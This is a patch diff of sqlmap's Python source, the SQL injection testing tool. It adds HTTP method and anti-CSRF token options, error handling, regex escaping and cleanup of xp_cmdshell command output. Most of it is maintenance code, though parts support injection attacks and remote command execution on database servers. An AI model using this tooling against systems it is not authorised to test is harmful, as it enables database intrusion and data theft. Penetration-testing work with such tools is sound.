|
||||
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex)
|
||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||
|
@ -537,13 +581,20 @@ def _createTargetDirs():
|
|||
|
||||
paths.SQLMAP_OUTPUT_PATH = tempDir
|
||||
|
||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), getUnicode(conf.hostname))
|
||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
||||
|
||||
if not os.path.isdir(conf.outputPath):
|
||||
try:
|
||||
os.makedirs(conf.outputPath, 0755)
|
||||
except OSError, ex:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
try:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except IOError, _:
|
||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||
errMsg += "Please make sure that your disk is not full and "
|
||||
errMsg += "that you have sufficient write permissions to "
|
||||
errMsg += "create temporary files and/or directories"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
warnMsg = "unable to create output directory "
|
||||
warnMsg += "'%s' (%s). " % (conf.outputPath, ex)
|
||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||
|
|
|
@ -285,7 +285,7 @@ def runCase(parse):
|
|||
elif result is False: # this means no SQL injection has been detected - if None, ignore
|
||||
retVal = False
|
||||
|
||||
console = getUnicode(console, system=True)
|
||||
console = getUnicode(console, encoding=sys.stdin.encoding)
|
||||
|
||||
if parse and retVal:
|
||||
with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:
|
||||
|
|
|
@ -106,7 +106,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||
kb.threadContinue = True
|
||||
kb.threadException = False
|
||||
|
||||
if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)):
|
||||
if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):
|
||||
while True:
|
||||
message = "please enter number of threads? [Enter for %d (current)] " % numThreads
|
||||
choice = readInput(message, default=str(numThreads))
|
||||
|
@ -115,11 +115,11 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
|
||||
logger.critical(errMsg)
|
||||
else:
|
||||
numThreads = int(choice)
|
||||
conf.threads = numThreads = int(choice)
|
||||
break
|
||||
|
||||
if numThreads == 1:
|
||||
warnMsg = "running in a single-thread mode. This could take a while."
|
||||
warnMsg = "running in a single-thread mode. This could take a while"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
try:
|
||||
|
|
|
@ -63,7 +63,7 @@ class MSSQLBannerHandler(ContentHandler):
|
|||
def endElement(self, name):
|
||||
if name == "signature":
|
||||
for version in (self._version, self._versionAlt):
|
||||
if version and re.search(r" %s[\.\ ]+" % version, self._banner):
|
||||
if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner):
|
||||
self._feedInfo("dbmsRelease", self._release)
|
||||
self._feedInfo("dbmsVersion", self._version)
|
||||
self._feedInfo("dbmsServicePack", self._servicePack)
|
||||
|
|
|
@ -41,7 +41,7 @@ def cmdLineParser():
|
|||
|
||||
checkSystemEncoding()
|
||||
|
||||
_ = os.path.normpath(sys.argv[0])
|
||||
_ = getUnicode(os.path.normpath(sys.argv[0]), encoding=sys.getfilesystemencoding())
|
||||
|
||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
||||
"\"%s\"" % _ if " " in _ else _)
|
||||
|
@ -90,6 +90,9 @@ def cmdLineParser():
|
|||
request = OptionGroup(parser, "Request", "These options can be used "
|
||||
"to specify how to connect to the target URL")
|
||||
|
||||
request.add_option("--method", dest="method",
|
||||
help="Force usage of given HTTP method (e.g. PUT)")
|
||||
|
||||
request.add_option("--data", dest="data",
|
||||
help="Data string to be sent through POST")
|
||||
|
||||
|
@ -136,6 +139,9 @@ def cmdLineParser():
|
|||
request.add_option("--auth-private", dest="authPrivate",
|
||||
help="HTTP authentication PEM private key file")
|
||||
|
||||
request.add_option("--ignore-401", dest="ignore401", action="store_true",
|
||||
help="Ignore HTTP Error 401 (Unauthorized)")
|
||||
|
||||
request.add_option("--proxy", dest="proxy",
|
||||
help="Use a proxy to connect to the target URL")
|
||||
|
||||
|
@ -187,6 +193,12 @@ def cmdLineParser():
|
|||
action="store_true",
|
||||
help="Skip URL encoding of payload data")
|
||||
|
||||
request.add_option("--csrf-token", dest="csrfToken",
|
||||
help="Parameter used to hold anti-CSRF token")
|
||||
|
||||
request.add_option("--csrf-url", dest="csrfUrl",
|
||||
help="URL address to visit to extract anti-CSRF token")
|
||||
|
||||
request.add_option("--force-ssl", dest="forceSSL",
|
||||
action="store_true",
|
||||
help="Force usage of SSL/HTTPS")
|
||||
|
@ -728,9 +740,6 @@ def cmdLineParser():
|
|||
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--ignore-401", dest="ignore401", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
|
@ -782,7 +791,7 @@ def cmdLineParser():
|
|||
advancedHelp = True
|
||||
|
||||
for arg in sys.argv:
|
||||
argv.append(getUnicode(arg, system=True))
|
||||
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||
|
||||
checkDeprecatedOptions(argv)
|
||||
|
||||
|
@ -831,7 +840,7 @@ def cmdLineParser():
|
|||
break
|
||||
|
||||
for arg in shlex.split(command):
|
||||
argv.append(getUnicode(arg, system=True))
|
||||
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||
|
||||
# Hide non-basic options in basic help case
|
||||
for i in xrange(len(argv)):
|
||||
|
@ -854,6 +863,9 @@ def cmdLineParser():
|
|||
|
||||
try:
|
||||
(args, _) = parser.parse_args(argv)
|
||||
except UnicodeEncodeError, ex:
|
||||
print "\n[!] %s" % ex.object.encode("unicode-escape")
|
||||
raise SystemExit
|
||||
except SystemExit:
|
||||
if "-h" in argv and not advancedHelp:
|
||||
print "\n[!] to see full list of options run with '-hh'"
|
||||
|
|
|
@ -10,6 +10,7 @@ from xml.etree import ElementTree as et
|
|||
from lib.core.data import conf
|
||||
from lib.core.data import paths
|
||||
from lib.core.datatype import AttribDict
|
||||
from lib.core.exception import SqlmapInstallationException
|
||||
|
||||
def cleanupVals(text, tag):
|
||||
if tag in ("clause", "where"):
|
||||
|
@ -67,6 +68,13 @@ def parseXmlNode(node):
|
|||
conf.tests.append(test)
|
||||
|
||||
def loadPayloads():
|
||||
doc = et.parse(paths.PAYLOADS_XML)
|
||||
try:
|
||||
doc = et.parse(paths.PAYLOADS_XML)
|
||||
except Exception, ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (paths.PAYLOADS_XML, ex)
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
|
||||
root = doc.getroot()
|
||||
parseXmlNode(root)
|
||||
|
|
|
@ -5,11 +5,13 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import httplib
|
||||
import re
|
||||
|
||||
from lib.core.common import readInput
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import SqlmapSyntaxException
|
||||
from lib.request.connect import Connect as Request
|
||||
from thirdparty.oset.pyoset import oset
|
||||
|
||||
|
@ -26,8 +28,13 @@ def parseSitemap(url, retVal=None):
|
|||
abortedFlag = False
|
||||
retVal = oset()
|
||||
|
||||
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||
for match in re.finditer(r"<loc>\s*([^<]+)", content):
|
||||
try:
|
||||
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||
except httplib.InvalidURL:
|
||||
errMsg = "invalid URL given for sitemap ('%s')" % url
|
||||
raise SqlmapSyntaxException, errMsg
|
||||
|
||||
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
||||
if abortedFlag:
|
||||
break
|
||||
url = match.group(1).strip()
|
||||
|
|
|
@ -38,6 +38,7 @@ from lib.parse.headers import headersParser
|
|||
from lib.parse.html import htmlParser
|
||||
from lib.utils.htmlentities import htmlEntities
|
||||
from thirdparty.chardet import detect
|
||||
from thirdparty.odict.odict import OrderedDict
|
||||
|
||||
def forgeHeaders(items=None):
|
||||
"""
|
||||
|
@ -51,8 +52,8 @@ def forgeHeaders(items=None):
|
|||
if items[_] is None:
|
||||
del items[_]
|
||||
|
||||
headers = dict(conf.httpHeaders)
|
||||
headers.update(items or {})
|
||||
headers = OrderedDict(conf.httpHeaders)
|
||||
headers.update(items.items())
|
||||
|
||||
class _str(str):
|
||||
def capitalize(self):
|
||||
|
@ -62,7 +63,7 @@ def forgeHeaders(items=None):
|
|||
return _str(self)
|
||||
|
||||
_ = headers
|
||||
headers = {}
|
||||
headers = OrderedDict()
|
||||
for key, value in _.items():
|
||||
success = False
|
||||
if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
|
||||
|
@ -94,7 +95,7 @@ def forgeHeaders(items=None):
|
|||
kb.mergeCookies = not _ or _[0] in ("y", "Y")
|
||||
|
||||
if kb.mergeCookies:
|
||||
_ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
|
||||
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
|
||||
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
||||
|
||||
if PLACE.COOKIE in conf.parameters:
|
||||
|
@ -105,7 +106,7 @@ def forgeHeaders(items=None):
|
|||
elif not kb.testMode:
|
||||
headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))
|
||||
|
||||
if kb.testMode:
|
||||
if kb.testMode and not conf.csrfToken:
|
||||
resetCookieJar(conf.cj)
|
||||
|
||||
return headers
|
||||
|
@ -267,33 +268,37 @@ def decodePage(page, contentEncoding, contentType):
|
|||
|
||||
# can't do for all responses because we need to support binary files too
|
||||
if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
|
||||
# e.g. Ãëàâà
|
||||
if "&#" in page:
|
||||
page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
|
||||
if kb.heuristicMode:
|
||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||
page = getUnicode(page, kb.pageEncoding)
|
||||
else:
|
||||
# e.g. Ãëàâà
|
||||
if "&#" in page:
|
||||
page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
|
||||
|
||||
# e.g. %20%28%29
|
||||
if "%" in page:
|
||||
page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
|
||||
# e.g. %20%28%29
|
||||
if "%" in page:
|
||||
page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
|
||||
|
||||
# e.g. &
|
||||
page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
|
||||
# e.g. &
|
||||
page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
|
||||
|
||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||
page = getUnicode(page, kb.pageEncoding)
|
||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||
page = getUnicode(page, kb.pageEncoding)
|
||||
|
||||
# e.g. ’…™
|
||||
if "&#" in page:
|
||||
def _(match):
|
||||
retVal = match.group(0)
|
||||
try:
|
||||
retVal = unichr(int(match.group(1)))
|
||||
except ValueError:
|
||||
pass
|
||||
return retVal
|
||||
page = re.sub(r"&#(\d+);", _, page)
|
||||
# e.g. ’…™
|
||||
if "&#" in page:
|
||||
def _(match):
|
||||
retVal = match.group(0)
|
||||
try:
|
||||
retVal = unichr(int(match.group(1)))
|
||||
except ValueError:
|
||||
pass
|
||||
return retVal
|
||||
page = re.sub(r"&#(\d+);", _, page)
|
||||
|
||||
# e.g. ζ
|
||||
page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
|
||||
# e.g. ζ
|
||||
page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
|
||||
|
||||
return page
|
||||
|
||||
|
|
|
@ -132,8 +132,15 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
|||
seq1 = seq1[count:]
|
||||
seq2 = seq2[count:]
|
||||
|
||||
seqMatcher.set_seq1(seq1)
|
||||
seqMatcher.set_seq2(seq2)
|
||||
while True:
|
||||
try:
|
||||
seqMatcher.set_seq1(seq1)
|
||||
seqMatcher.set_seq2(seq2)
|
||||
except MemoryError:
|
||||
seq1 = seq1[:len(seq1) / 4]
|
||||
seq2 = seq2[:len(seq2) / 4]
|
||||
else:
|
||||
break
|
||||
|
||||
ratio = round(seqMatcher.quick_ratio(), 3)
|
||||
|
||||
|
|
|
@ -62,7 +62,9 @@ from lib.core.enums import REDIRECTION
|
|||
from lib.core.enums import WEB_API
|
||||
from lib.core.exception import SqlmapCompressionException
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapGenericException
|
||||
from lib.core.exception import SqlmapSyntaxException
|
||||
from lib.core.exception import SqlmapTokenException
|
||||
from lib.core.exception import SqlmapValueException
|
||||
from lib.core.settings import ASTERISK_MARKER
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
|
@ -92,8 +94,9 @@ from lib.request.basic import processResponse
|
|||
from lib.request.direct import direct
|
||||
from lib.request.comparison import comparison
|
||||
from lib.request.methodrequest import MethodRequest
|
||||
from thirdparty.socks.socks import ProxyError
|
||||
from thirdparty.multipart import multipartpost
|
||||
from thirdparty.odict.odict import OrderedDict
|
||||
from thirdparty.socks.socks import ProxyError
|
||||
|
||||
|
||||
class Connect(object):
|
||||
|
@ -271,7 +274,6 @@ class Connect(object):
|
|||
url, params = url.split('?', 1)
|
||||
params = urlencode(params)
|
||||
url = "%s?%s" % (url, params)
|
||||
requestMsg += "?%s" % params
|
||||
|
||||
elif multipart:
|
||||
# Needed in this form because of potential circle dependency
|
||||
|
@ -305,7 +307,7 @@ class Connect(object):
|
|||
url = "%s?%s" % (url, get)
|
||||
requestMsg += "?%s" % get
|
||||
|
||||
if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
|
||||
if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:
|
||||
post = conf.parameters[PLACE.POST]
|
||||
|
||||
elif get:
|
||||
|
@ -353,6 +355,7 @@ class Connect(object):
|
|||
post = unicodeencode(post, kb.pageEncoding)
|
||||
|
||||
if method:
|
||||
method = unicodeencode(method)
|
||||
req = MethodRequest(url, post, headers)
|
||||
req.set_method(method)
|
||||
else:
|
||||
|
@ -385,7 +388,7 @@ class Connect(object):
|
|||
|
||||
conn = urllib2.urlopen(req)
|
||||
|
||||
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.authType.lower() == AUTH_TYPE.BASIC.lower():
|
||||
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
|
||||
kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
|
||||
|
||||
if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
|
||||
|
@ -632,13 +635,14 @@ class Connect(object):
|
|||
auxHeaders = {}
|
||||
|
||||
raise404 = place != PLACE.URI if raise404 is None else raise404
|
||||
method = method or conf.method
|
||||
|
||||
value = agent.adjustLateValues(value)
|
||||
payload = agent.extractPayload(value)
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
if conf.httpHeaders:
|
||||
headers = dict(conf.httpHeaders)
|
||||
headers = OrderedDict(conf.httpHeaders)
|
||||
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
|
||||
|
||||
if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
|
||||
|
@ -650,7 +654,13 @@ class Connect(object):
|
|||
if payload:
|
||||
if kb.tamperFunctions:
|
||||
for function in kb.tamperFunctions:
|
||||
payload = function(payload=payload, headers=auxHeaders)
|
||||
try:
|
||||
payload = function(payload=payload, headers=auxHeaders)
|
||||
except Exception, ex:
|
||||
errMsg = "error occurred while running tamper "
|
||||
errMsg += "function '%s' ('%s')" % (function.func_name, ex)
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
if not isinstance(payload, basestring):
|
||||
errMsg = "tamper function '%s' returns " % function.func_name
|
||||
errMsg += "invalid payload type ('%s')" % type(payload)
|
||||
|
@ -747,13 +757,63 @@ class Connect(object):
|
|||
if value and place == PLACE.CUSTOM_HEADER:
|
||||
auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
|
||||
|
||||
if conf.csrfToken:
|
||||
def _adjustParameter(paramString, parameter, newValue):
|
||||
retVal = paramString
|
||||
match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
|
||||
if match:
|
||||
origValue = match.group("value")
|
||||
retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
|
||||
return retVal
|
||||
|
||||
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||
match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
|
||||
token = (match.group(2) or match.group(3) or match.group(4)) if match else None
|
||||
|
||||
if not token:
|
||||
if conf.csrfUrl != conf.url and code == httplib.OK:
|
||||
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
|
||||
token = page
|
||||
|
||||
if not token and any(_.name == conf.csrfToken for _ in conf.cj):
|
||||
for _ in conf.cj:
|
||||
if _.name == conf.csrfToken:
|
||||
token = _.value
|
||||
if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
|
||||
if post:
|
||||
post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
||||
elif get:
|
||||
get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
||||
else:
|
||||
get = "%s=%s" % (conf.csrfToken, token)
|
||||
break
|
||||
|
||||
if not token:
|
||||
errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
|
||||
if not conf.csrfUrl:
|
||||
errMsg += ". You can try to rerun by providing "
|
||||
errMsg += "a valid value for option '--csrf-url'"
|
||||
raise SqlmapTokenException, errMsg
|
||||
|
||||
if token:
|
||||
for place in (PLACE.GET, PLACE.POST):
|
||||
if place in conf.parameters:
|
||||
if place == PLACE.GET and get:
|
||||
get = _adjustParameter(get, conf.csrfToken, token)
|
||||
elif place == PLACE.POST and post:
|
||||
post = _adjustParameter(post, conf.csrfToken, token)
|
||||
|
||||
for i in xrange(len(conf.httpHeaders)):
|
||||
if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
|
||||
conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)
|
||||
|
||||
if conf.rParam:
|
||||
def _randomizeParameter(paramString, randomParameter):
|
||||
retVal = paramString
|
||||
match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)
|
||||
match = re.search("%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
|
||||
if match:
|
||||
origValue = match.group("value")
|
||||
retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
|
||||
retVal = re.sub("%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
|
||||
return retVal
|
||||
|
||||
for randomParameter in conf.rParam:
|
||||
|
@ -768,7 +828,7 @@ class Connect(object):
|
|||
|
||||
if conf.evalCode:
|
||||
delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
|
||||
variables = {}
|
||||
variables = {"uri": uri}
|
||||
originals = {}
|
||||
|
||||
for item in filter(None, (get, post if not kb.postHint else None)):
|
||||
|
@ -787,6 +847,7 @@ class Connect(object):
|
|||
|
||||
originals.update(variables)
|
||||
evaluateCode(conf.evalCode, variables)
|
||||
uri = variables["uri"]
|
||||
|
||||
for name, value in variables.items():
|
||||
if name != "__builtins__" and originals.get(name, "") != value:
|
||||
|
@ -794,7 +855,7 @@ class Connect(object):
|
|||
found = False
|
||||
value = unicode(value)
|
||||
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter))
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||
if re.search(regex, (get or "")):
|
||||
found = True
|
||||
get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
|
||||
|
@ -883,7 +944,7 @@ class Connect(object):
|
|||
elif kb.nullConnection == NULLCONNECTION.RANGE:
|
||||
auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
|
||||
|
||||
_, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
||||
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
||||
|
||||
if headers:
|
||||
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
|
||||
|
@ -895,7 +956,7 @@ class Connect(object):
|
|||
|
||||
if not pageLength:
|
||||
try:
|
||||
page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
||||
page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
||||
except MemoryError:
|
||||
page, headers, code = None, None, None
|
||||
warnMsg = "site returned insanely large response"
|
||||
|
|
|
@ -19,7 +19,7 @@ try:
|
|||
except ImportError:
|
||||
pass
|
||||
|
||||
_protocols = [ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23]
|
||||
_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_SSLv3", "PROTOCOL_TLSv1", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))
|
||||
|
||||
class HTTPSConnection(httplib.HTTPSConnection):
|
||||
"""
|
||||
|
|
|
@ -38,6 +38,7 @@ from lib.core.enums import CHARSET_TYPE
|
|||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import EXPECTED
|
||||
from lib.core.enums import PAYLOAD
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapNotVulnerableException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
||||
|
@ -371,11 +372,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
|||
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
||||
kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
|
||||
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||
fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion
|
||||
|
||||
try:
|
||||
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||
except SqlmapConnectionException:
|
||||
if not fallback:
|
||||
raise
|
||||
|
||||
count += 1
|
||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||
|
||||
if not found and not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion:
|
||||
if not found and fallback:
|
||||
warnMsg = "something went wrong with full UNION "
|
||||
warnMsg += "technique (could be because of "
|
||||
warnMsg += "limitation on retrieved number of entries)"
|
||||
|
|
|
@ -8,6 +8,7 @@ See the file 'doc/COPYING' for copying permission
|
|||
import os
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import checkFile
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import isStackingAvailable
|
||||
|
@ -146,6 +147,7 @@ class UDF:
|
|||
|
||||
if len(self.udfToCreate) > 0:
|
||||
self.udfSetRemotePath()
|
||||
checkFile(self.udfLocalFile)
|
||||
written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)
|
||||
|
||||
if written is not True:
|
||||
|
|
|
@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
|||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import flattenValue
|
||||
from lib.core.common import getLimitRange
|
||||
from lib.core.common import getSQLSnippet
|
||||
from lib.core.common import hashDBWrite
|
||||
|
@ -226,12 +227,16 @@ class Xp_cmdshell:
|
|||
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
|
||||
|
||||
if output and isListLike(output) and len(output) > 1:
|
||||
if not (output[0] or "").strip():
|
||||
output = output[1:]
|
||||
elif not (output[-1] or "").strip():
|
||||
output = output[:-1]
|
||||
_ = ""
|
||||
lines = [line for line in flattenValue(output) if line is not None]
|
||||
|
||||
output = "\n".join(line for line in filter(None, output))
|
||||
for i in xrange(len(lines)):
|
||||
line = lines[i] or ""
|
||||
if line is None or i in (0, len(lines) - 1) and not line.strip():
|
||||
continue
|
||||
_ += "%s\n" % line
|
||||
|
||||
output = _.rstrip('\n')
|
||||
|
||||
return output
|
||||
|
||||
|
|
|
@ -116,7 +116,7 @@ def tableExists(tableFile, regex=None):
|
|||
|
||||
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
|
||||
clearConsoleLine(True)
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
|
||||
dataToStdout(infoMsg, True)
|
||||
|
||||
if conf.verbose in (1, 2):
|
||||
|
@ -224,11 +224,11 @@ def columnExists(columnFile, regex=None):
|
|||
|
||||
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
|
||||
clearConsoleLine(True)
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
||||
dataToStdout(infoMsg, True)
|
||||
|
||||
if conf.verbose in (1, 2):
|
||||
status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
||||
status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
||||
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
|
||||
|
||||
